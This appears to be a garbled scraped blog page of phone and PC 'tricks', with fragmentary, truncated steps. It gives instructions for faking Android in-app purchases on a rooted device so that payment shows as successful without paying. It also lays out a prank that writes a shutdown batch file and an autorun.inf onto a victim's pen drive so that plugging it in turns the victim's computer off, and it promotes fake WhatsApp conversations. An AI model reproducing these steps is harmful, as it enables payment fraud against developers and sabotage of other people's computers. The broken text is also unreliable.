I'm back with a new trick.. how to use jio in 3g handset..
For this u have to download 2 apps..
Full procedure is in the video..link given below..
How to use jio in 3g handset
According to Einstein “There are two things which have no end, one is UNIVERSE and second is Human's STUPIDITY”. So don't be fooled, never click on any file sent through chatting. And keep one thing in mind that "hacking can only be done through your mistakes”.
Several android apps having in app
purchases means
THE GAMES " etc....
These purches are hacked by using
an app.the app is
Note : ROOT is nessasary
Download app from these link
Download Here
Open the app and give permission for
root access.
Wait until it loading the apps
1.Select any app that you want to
2.wait some time and the app will is
3.select which you want to buy from
that app
4.the google play services shows
some cost.
5.click to buy.
6.the google play store shows
payment is success without paying
Try It to
College,school,institute....and Fun With
Step 1:>>copy this code into notepad:
@echo off
shutdown -s -t 00
Save as chirag.bat extension (for eg:
Step 2:
Now open the notepad and copy this code:
Action=Mouse Disable
Save it as "autorun.inf"
Step 3:
Then copy the two files in your pen drive or
victim's pen drive.
That's all whenever the victim insert his pen
drive,the system will be turned off
Check How to Disable This:-
First Stop Autorun in Your Computer And
Then Format Pendrive..
it's Not A Trick
It's Funny App called " Whatsaid - Whatsapp Prank "
install WhatSaid on your Android
device and Start creating fake
Conversations and Make Pranks on
your friends.
Try it.. If u like it then subscribe us..